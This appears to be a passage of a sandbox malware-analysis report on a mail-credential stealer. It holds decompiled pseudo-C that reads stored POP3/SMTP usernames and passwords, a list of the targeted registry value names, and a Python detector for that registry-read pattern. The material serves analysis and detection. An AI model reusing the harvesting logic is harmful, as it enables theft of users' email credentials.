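        if vals & IDENTITY_VALUES and vals & SECRET_VALUES:
            hits[k] = {
                "access": decode_key_access(opens.get(k, 0)),  # [] if the open was not seen
                "values": sorted(vals),
            }
    return hits


# Constructed sample trace: key path and PIDs are made up for this example.
SAMPLE_KEY = r"HKCU\Software\ExampleMailClient\Accounts\00000001"
SAMPLE_EVENTS = [
    # pid 2460 behaves like E00402D74: KEY_READ open, then every field including both passwords
    RegEvent(2460, "RegOpenKeyExA", SAMPLE_KEY, access=0x20019),
    *[RegEvent(2460, "RegQueryValueExA", SAMPLE_KEY, v) for v in (
        "DisplayName", "EmailAddress", "PopAccount", "PopServer", "PopPort",
        "PopLogSecure", "PopPassword", "SMTPAccount", "SMTPServer", "SMTPPort",
        "SMTPLogSecure", "SMTPPassword")],
    # pid 1180 reads connection settings only, no password blob: not flagged
    RegEvent(1180, "RegOpenKeyExA", SAMPLE_KEY, access=0x20019),
    RegEvent(1180, "RegQueryValueExA", SAMPLE_KEY, "PopServer"),
    RegEvent(1180, "RegQueryValueExA", SAMPLE_KEY, "PopPort"),
]


if __name__ == "__main__":
    for (pid, key), info in find_credential_harvesters(SAMPLE_EVENTS).items():
        print(f"pid {pid} read {info['values']} from {key} (opened with {info['access']})")
```

KEY_READ on its own is what every legitimate client uses, so the signal is the conjunction of value names read through one handle, not the access mask. In a real deployment the constructed SAMPLE_EVENTS would be replaced by Sysmon or ETW registry events, and the image path of the installed mail client would be allowlisted, since the client itself reads exactly these values.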



































APIs
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
  • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
  • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
  • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
• strcpy.MSVCRT(?,?), ref: 00402E8B
• strcpy.MSVCRT(?,?,?,?), ref: 00402E9E
• strcpy.MSVCRT(?,?), ref: 00402F2B
• strcpy.MSVCRT(?,?,?,?), ref: 00402F38
• RegCloseKey.ADVAPI32(?), ref: 00402F92
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: strcpy$QueryValue$CloseOpen
• String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
• API String ID: 4127491968-1534328989
• Opcode ID: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
• Instruction ID: 3eb728c69d877055b887914c3e29035f7ad0c3b4bfdbdde50966da93315596c3
• Opcode Fuzzy Hash: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
• Instruction Fuzzy Hash: 315139B1910218BEDB21EF51CD06BDE777CAF04304F1081B7BA08B6191E7789B989F58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Decompiler output (sandbox-generated pseudo-C); variable names are stack offsets.
E004033B1(void* __edi, void* __fp0, intOrPtr _a4) {
	char _v276;
	char _v404;
	intOrPtr _v408;
	char _v664;
	intOrPtr _v796;
	char _v936;
	char _v1208;
	char _v1336;
	intOrPtr _v1340;
	char _v1596;
	intOrPtr _v1728;
	char _v1868;
	void* __esi;
	intOrPtr _t23;
	void* _t35;

	_t48 = __fp0;
	// initialise two record structures on the stack
	E00402197( &_v936);
	E00402197( &_v1868);
	_t23 = 4;
	_v796 = _t23;
	_v1728 = _t23;
	_v408 = _t23;
	_v1340 = 1;
	// look up six named SMTP/POP3 fields into stack buffers
	E00403371(__edi, "SMTPServer",  &_v664);
	E00403371(__edi, "ESMTPUsername",  &_v404);
	E00403371(__edi, "ESMTPPassword",  &_v276);
	E00403371(__edi, "POP3Server",  &_v1596);
	E00403371(__edi, "POP3Username",  &_v1336);
	_t35 = E00403371(__edi, "POP3Password",  &_v1208);
	// a record is only processed and handed to E004023C6 when its password field is non-empty
	if(_v276 != 0) {
		E00403392( &_v276);
		_t35 = E004023C6( &_v936, __fp0, _a4);
	}
	if(_v1208 != 0) {
		E00403392( &_v1208);
		return E004023C6( &_v1868, _t48, _a4);
	}
	return _t35;
}

Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: PrivateProfileString_mbscmpstrlen
• String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
• API String ID: 3963849919-1658304561
• Opcode ID: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
• Instruction ID: ad4fe9f44f4ec6704836124f0b121ca839780027ba1e1250375890495da90f14
• Opcode Fuzzy Hash: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
• Instruction Fuzzy Hash: F421BEB1C0022C6EDB61EF118D86FED7B7C9F45705F4000ABAA48B6092DB7C5BC59E59
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 99%
// Decompiler output (sandbox-generated pseudo-C); listing is truncated after the local declarations.
E0040FEB1(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
	signed int _v8;
	void* _v11;
	char _v12;
	char _v13;
	char _v19;
	char _v20;
	char _v21;
	char _v22;
	char _v23;
	char _v24;
	signed int _v28;
	short _v30;
	short _v32;
	char* _v36;
	char* _v40;
	intOrPtr _v44;
	intOrPtr _v48;
	intOrPtr _v52;
	char* _v56;
	char* _v60;
	char* _v64;
	char _v76;
	void _v88;
	intOrPtr _v92;
                                                                                                                                                                  				char* _v96;
                                                                                                                                                                  				char* _v100;
                                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                                  				char* _v108;
                                                                                                                                                                  				char* _v112;
                                                                                                                                                                  				char* _v116;
                                                                                                                                                                  				char* _v120;
                                                                                                                                                                  				char* _v124;
                                                                                                                                                                  				intOrPtr _v128;
                                                                                                                                                                  				char* _v132;
                                                                                                                                                                  				char* _v136;
                                                                                                                                                                  				char* _v140;
                                                                                                                                                                  				char* _v144;
                                                                                                                                                                  				char* _v148;
                                                                                                                                                                  				char* _v152;
                                                                                                                                                                  				intOrPtr _v156;
                                                                                                                                                                  				char* _v160;
                                                                                                                                                                  				char* _v164;
                                                                                                                                                                  				char* _v168;
                                                                                                                                                                  				intOrPtr _v172;
                                                                                                                                                                  				char* _v176;
                                                                                                                                                                  				char* _v180;
                                                                                                                                                                  				char* _v184;
                                                                                                                                                                  				char* _v188;
                                                                                                                                                                  				char* _v192;
                                                                                                                                                                  				char* _v196;
                                                                                                                                                                  				intOrPtr _v200;
                                                                                                                                                                  				char* _v204;
                                                                                                                                                                  				char* _v208;
                                                                                                                                                                  				char* _v212;
                                                                                                                                                                  				char* _v216;
                                                                                                                                                                  				char* _v220;
                                                                                                                                                                  				char* _v224;
                                                                                                                                                                  				char* _v228;
                                                                                                                                                                  				intOrPtr _v232;
                                                                                                                                                                  				char* _v236;
                                                                                                                                                                  				char* _v240;
                                                                                                                                                                  				char* _v244;
                                                                                                                                                                  				char* _v248;
                                                                                                                                                                  				char* _v252;
                                                                                                                                                                  				intOrPtr _v256;
                                                                                                                                                                  				char* _v260;
                                                                                                                                                                  				char* _v264;
                                                                                                                                                                  				char* _v268;
                                                                                                                                                                  				char* _v272;
                                                                                                                                                                  				char* _v276;
                                                                                                                                                                  				char* _v280;
                                                                                                                                                                  				intOrPtr _v284;
                                                                                                                                                                  				char* _v288;
                                                                                                                                                                  				char* _v292;
                                                                                                                                                                  				char* _v296;
                                                                                                                                                                  				intOrPtr _v300;
                                                                                                                                                                  				char* _v304;
                                                                                                                                                                  				char* _v308;
                                                                                                                                                                  				char* _v312;
                                                                                                                                                                  				char* _v316;
                                                                                                                                                                  				char* _v320;
                                                                                                                                                                  				char* _v324;
                                                                                                                                                                  				intOrPtr _v328;
                                                                                                                                                                  				char* _v332;
                                                                                                                                                                  				char* _v336;
                                                                                                                                                                  				char* _v340;
                                                                                                                                                                  				char* _v344;
                                                                                                                                                                  				char* _v348;
                                                                                                                                                                  				char* _v352;
                                                                                                                                                                  				char* _v356;
                                                                                                                                                                  				char* _v360;
                                                                                                                                                                  				char* _v364;
                                                                                                                                                                  				intOrPtr _v368;
                                                                                                                                                                  				intOrPtr _v372;
                                                                                                                                                                  				char* _v376;
                                                                                                                                                                  				char* _v380;
                                                                                                                                                                  				intOrPtr _v384;
                                                                                                                                                                  				char* _v388;
                                                                                                                                                                  				char* _v392;
                                                                                                                                                                  				intOrPtr _v396;
                                                                                                                                                                  				intOrPtr _v400;
                                                                                                                                                                  				char* _v404;
                                                                                                                                                                  				char* _v408;
                                                                                                                                                                  				intOrPtr _v412;
                                                                                                                                                                  				char* _v416;
                                                                                                                                                                  				char* _v420;
                                                                                                                                                                  				char* _v424;
                                                                                                                                                                  				char* _v428;
                                                                                                                                                                  				intOrPtr _v432;
                                                                                                                                                                  				intOrPtr _v436;
                                                                                                                                                                  				char* _v440;
                                                                                                                                                                  				intOrPtr _v444;
                                                                                                                                                                  				char* _v448;
                                                                                                                                                                  				char* _v452;
                                                                                                                                                                  				char* _v456;
                                                                                                                                                                  				char* _v460;
                                                                                                                                                                  				intOrPtr _v464;
                                                                                                                                                                  				char* _v468;
                                                                                                                                                                  				intOrPtr* _t200;
                                                                                                                                                                  				char* _t202;
                                                                                                                                                                  				char _t203;
                                                                                                                                                                  				int _t205;
                                                                                                                                                                  				int _t206;
                                                                                                                                                                  				intOrPtr _t209;
                                                                                                                                                                  				char* _t211;
                                                                                                                                                                  				int _t213;
                                                                                                                                                                  				void _t216;
                                                                                                                                                                  				char _t220;
                                                                                                                                                                  				void _t221;
                                                                                                                                                                  				int _t226;
                                                                                                                                                                  				signed int _t231;
                                                                                                                                                                  				intOrPtr* _t232;
                                                                                                                                                                  				void _t237;
                                                                                                                                                                  				void* _t238;
                                                                                                                                                                  				void* _t240;
                                                                                                                                                                  				void* _t245;
                                                                                                                                                                  				signed int _t246;
                                                                                                                                                                  				signed int _t249;
                                                                                                                                                                  				int _t250;
                                                                                                                                                                  				void* _t251;
                                                                                                                                                                  				int _t252;
                                                                                                                                                                  				void* _t254;
                                                                                                                                                                  				void* _t255;
                                                                                                                                                                  				void* _t256;
                                                                                                                                                                  
                                                                                                                                                                  				_v64 = "amp;";
                                                                                                                                                                  				_v60 = "lt;";
                                                                                                                                                                  				_v56 = "gt;";
                                                                                                                                                                  				_v52 = "quot;";
                                                                                                                                                                  				_v48 = "nbsp;";
                                                                                                                                                                  				_v44 = "apos;";
                                                                                                                                                                  				_v24 = 0x26;
                                                                                                                                                                  				_v23 = 0x3c;
                                                                                                                                                                  				_v22 = 0x3e;
                                                                                                                                                                  				_v21 = 0x22;
                                                                                                                                                                  				_v20 = 0x20;
                                                                                                                                                                  				_v19 = 0x27;
                                                                                                                                                                  				_v468 = "iexcl;";
                                                                                                                                                                  				_v464 = "cent;";
                                                                                                                                                                  				_v460 = "pound;";
                                                                                                                                                                  				_v456 = "curren;";
                                                                                                                                                                  				_v452 = "yen;";
                                                                                                                                                                  				_v448 = "brvbar;";
                                                                                                                                                                  				_v444 = "sect;";
                                                                                                                                                                  				_v440 = "uml;";
                                                                                                                                                                  				_v436 = "copy;";
                                                                                                                                                                  				_v432 = "ordf;";
                                                                                                                                                                  				_v428 = "laquo;";
                                                                                                                                                                  				_v424 = "not;";
                                                                                                                                                                  				_v420 = "shy;";
                                                                                                                                                                  				_v416 = "reg;";
                                                                                                                                                                  				_v412 = "macr;";
                                                                                                                                                                  				_v408 = "deg;";
                                                                                                                                                                  				_v404 = "plusmn;";
                                                                                                                                                                  				_v400 = "sup2;";
                                                                                                                                                                  				_v396 = "sup3;";
                                                                                                                                                                  				_v392 = "acute;";
                                                                                                                                                                  				_v388 = "micro;";
                                                                                                                                                                  				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406541( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_t221 == 0x3b) {
                                                                                                                                                                  									_v8 = _t246;
                                                                                                                                                                  									L18:
                                                                                                                                                                  									if(_v8 <= 0) {
                                                                                                                                                                  										goto L29;
                                                                                                                                                                  									}
                                                                                                                                                                  									memcpy( &_v76, _t251, _v8);
                                                                                                                                                                  									 *((char*)(_t255 + _v8 - 0x48)) = 0;
                                                                                                                                                                  									_t226 = atoi( &_v76);
                                                                                                                                                                  									_t256 = _t256 + 0x10;
                                                                                                                                                                  									_v32 = _t226;
                                                                                                                                                                  									_v12 = 0;
                                                                                                                                                                  									asm("stosb");
                                                                                                                                                                  									_v30 = 0;
                                                                                                                                                                  									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
                                                                                                                                                                  									 *((char*)(_t231 + _a4)) = _v12;
                                                                                                                                                                  									_t231 = _t231 + 1;
                                                                                                                                                                  									_t254 = _t254 + _v8 + 3;
                                                                                                                                                                  									goto L43;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t246 = _t246 + 1;
                                                                                                                                                                  								if(_t246 >= 6) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t240 = _t240 + 1;
                                                                                                                                                                  							}
                                                                                                                                                                  							_v8 = _v8 | 0xffffffff;
                                                                                                                                                                  							goto L18;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
                                                                                                                                                                  					_t231 = _t231 + 1;
                                                                                                                                                                  					_t254 = _t254 + _v8 + 1;
                                                                                                                                                                  					goto L43;
                                                                                                                                                                  				}
                                                                                                                                                                  				goto L45;
                                                                                                                                                                  			}
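Added example, not part of the report or of the sample's code: a readable C reconstruction of the ';'-terminated numeric-token branch in the decompiled fragment above (the arm entered when _t221 == 0x3b). The names find_terminator, decode_numeric_token, SCAN_LIMIT and DIGIT_BUF are assumptions derived from the listing's constants (the loop gives up at _t246 >= 6; the _v76.._v32 span is 0x2c = 44 bytes). The WideCharToMultiByte call is replaced by taking the low byte of the converted code so the example runs off Windows, and the listing's "_t254 + _v8 + 3" offset advance is modelled as len + 1 on the input pointer, on the assumption that a 2-byte prefix was consumed before _t251 (which the fragment does not show). The point it makes explicit for a reviewer: the scan stops after six bytes, so memcpy( &_v76, _t251, _v8) copies between one and five bytes into a 44-byte stack buffer and this branch alone cannot overflow the stack.

```c
/* Reconstruction of the ';'-terminated numeric-token branch seen in the
 * decompiled listing. Names, buffer size and the prefix assumption are this
 * example's own, not the sample's. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SCAN_LIMIT 6   /* listing: loop breaks when _t246 >= 6 */
#define DIGIT_BUF  44  /* listing: _v76 (ebp-0x4c) up to _v32 (ebp-0x20) */

/* Index of ';' within the first SCAN_LIMIT bytes of s, or -1 if a NUL or the
 * limit is hit first (the listing's "_v8 = _v8 | 0xffffffff" path). */
int find_terminator(const char *s) {
    for (int i = 0; i < SCAN_LIMIT; i++) {
        if (s[i] == '\0') return -1;
        if (s[i] == ';')  return i;
    }
    return -1;
}

/* Decode one token at *in (digits followed by ';'). On success store one
 * output byte, advance *in past the ';' and return 1; on a missing or empty
 * token return 0 and leave *in untouched (the listing's "_v8 <= 0 -> L29"). */
int decode_numeric_token(const char **in, unsigned char *out) {
    char buf[DIGIT_BUF];
    int len = find_terminator(*in);
    if (len <= 0) return 0;
    /* len is at most SCAN_LIMIT - 1 == 5, well inside DIGIT_BUF: the bounded
       scan is what keeps this stack memcpy safe, as in the listing */
    memcpy(buf, *in, (size_t)len);
    buf[len] = '\0';
    int code = atoi(buf);
    /* The listing converts the value with WideCharToMultiByte into a 2-byte
       buffer and stores the first byte; modelled here as the low byte
       (assumption, exact for code points below 0x80). */
    *out = (unsigned char)(code & 0xff);
    *in += len + 1;
    return 1;
}

/* Constructed input for the demo: two valid tokens, then one whose ';' lies
 * beyond the 6-byte window and must be rejected. Returns bytes decoded. */
int demo_decode(char *dst, size_t dstlen) {
    const char *src = "72;105;1234567;";
    size_t n = 0;
    unsigned char c;
    while (n + 1 < dstlen && decode_numeric_token(&src, &c)) {
        dst[n++] = (char)c;
    }
    dst[n] = '\0';
    return (int)n;
}

int main(void) {
    char out[16];
    int n = demo_decode(out, sizeof out);
    printf("decoded %d byte(s): \"%s\"\n", n, out);
    return 0;
}
```

The third token in demo_decode has no ';' inside the six-byte window, so find_terminator returns -1 and decoding stops, which mirrors the fall-through from the "_v8 | 0xffffffff; goto L18" path into the _v8 <= 0 check.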
[Disassembly address column only: instruction addresses from 0x0040febc to 0x004104ad (one 0x00000000 entry); the instruction text for these addresses is not present on the page.]
                                                                                                                                                                  0x00410480
                                                                                                                                                                  0x00410487
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410487
                                                                                                                                                                  0x004102c6
                                                                                                                                                                  0x004102c9
                                                                                                                                                                  0x004102cc
                                                                                                                                                                  0x004102d0
                                                                                                                                                                  0x004102da
                                                                                                                                                                  0x004102e0
                                                                                                                                                                  0x004102e5
                                                                                                                                                                  0x004102ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004102ec
                                                                                                                                                                  0x004102f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004102f2
                                                                                                                                                                  0x004102fa
                                                                                                                                                                  0x00410405
                                                                                                                                                                  0x00410405
                                                                                                                                                                  0x00410409
                                                                                                                                                                  0x0041040c
                                                                                                                                                                  0x00410414
                                                                                                                                                                  0x0041041c
                                                                                                                                                                  0x00410425
                                                                                                                                                                  0x0041042a
                                                                                                                                                                  0x0041042f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410431
                                                                                                                                                                  0x00410438
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041043a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041043a
                                                                                                                                                                  0x0041046e
                                                                                                                                                                  0x00410471
                                                                                                                                                                  0x00410472
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410472
                                                                                                                                                                  0x00410300
                                                                                                                                                                  0x00410300
                                                                                                                                                                  0x00410304
                                                                                                                                                                  0x00410309
                                                                                                                                                                  0x004103ba
                                                                                                                                                                  0x004103ba
                                                                                                                                                                  0x004103be
                                                                                                                                                                  0x004103c0
                                                                                                                                                                  0x004103cf
                                                                                                                                                                  0x004103cf
                                                                                                                                                                  0x004103d3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103c6
                                                                                                                                                                  0x004103d8
                                                                                                                                                                  0x004103da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103e2
                                                                                                                                                                  0x004103eb
                                                                                                                                                                  0x004103f0
                                                                                                                                                                  0x004103f8
                                                                                                                                                                  0x004103fb
                                                                                                                                                                  0x004103fe
                                                                                                                                                                  0x004103ff
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103ff
                                                                                                                                                                  0x004103c8
                                                                                                                                                                  0x004103cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103ce
                                                                                                                                                                  0x004103ce
                                                                                                                                                                  0x004103d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410318
                                                                                                                                                                  0x00410318
                                                                                                                                                                  0x0041031a
                                                                                                                                                                  0x00410340
                                                                                                                                                                  0x00410340
                                                                                                                                                                  0x00410344
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410337
                                                                                                                                                                  0x004103b5
                                                                                                                                                                  0x0041034a
                                                                                                                                                                  0x0041034e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041035c
                                                                                                                                                                  0x00410364
                                                                                                                                                                  0x0041036d
                                                                                                                                                                  0x00410372
                                                                                                                                                                  0x0041037d
                                                                                                                                                                  0x0041038c
                                                                                                                                                                  0x00410394
                                                                                                                                                                  0x00410395
                                                                                                                                                                  0x00410399
                                                                                                                                                                  0x004103a5
                                                                                                                                                                  0x004103ab
                                                                                                                                                                  0x004103ac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103ac
                                                                                                                                                                  0x00410339
                                                                                                                                                                  0x0041033d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041033f
                                                                                                                                                                  0x0041033f
                                                                                                                                                                  0x00410346
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410346
                                                                                                                                                                  0x00410309
                                                                                                                                                                  0x00410325
                                                                                                                                                                  0x0041032b
                                                                                                                                                                  0x0041032c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041032c
                                                                                                                                                                  0x00000000

APIs
• strlen.MSVCRT ref: 004102D0
• strncmp.MSVCRT(?,00414FF4,00000000,00414FF4,?,?,?), ref: 004102E0
• memcpy.MSVCRT ref: 0041035C
• atoi.MSVCRT ref: 0041036D
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00410399
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
• String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
• API String ID: 1895597112-3210201812
• Opcode ID: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
• Instruction ID: 0fafc75884cef128377fd64f4b7a28f8ddc93d47313dbc0ddeda27c5dc7f40ea
• Opcode Fuzzy Hash: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
• Instruction Fuzzy Hash: 6FF1D5B1805A98DEDF21CF94C9887DDBBB0BB85308F1481CAD5586B241C7B94AC9CF9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
E00410D67(void* __ecx, void* __edx) {
	void* __ebx;
	void* __edi;
	int _t58;
	int _t59;
	int _t60;
	int _t61;
	int _t63;
	void* _t96;
	void* _t99;
	void* _t102;
	void* _t105;
	void* _t108;
	void* _t111;
	void* _t114;
	void* _t117;
	void* _t123;
	void* _t194;
	void* _t195;   /* declaration added: used below but omitted by the decompiler */
	void* _t196;
	void* _t201;
	char* _t202;
	void** _t204;  /* declaration added: used below but omitted by the decompiler */

	_t194 = __edx;
	_t201 = __ecx;
	/* The object passed in __ecx holds a field name at offset 0x46c; this branch handles the "Account_Name" field. */
	if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
		/* Offset 0x460 holds a pointer to the field value; it is converted (E00406BA3) and copied into a 0xff-byte buffer at offset 0x870 (E004060DA). */
		_t204 = _t201 + 0x460;
		E004060DA(0xff, _t201 + 0x870, E00406BA3( *(_t201 + 0x460)));
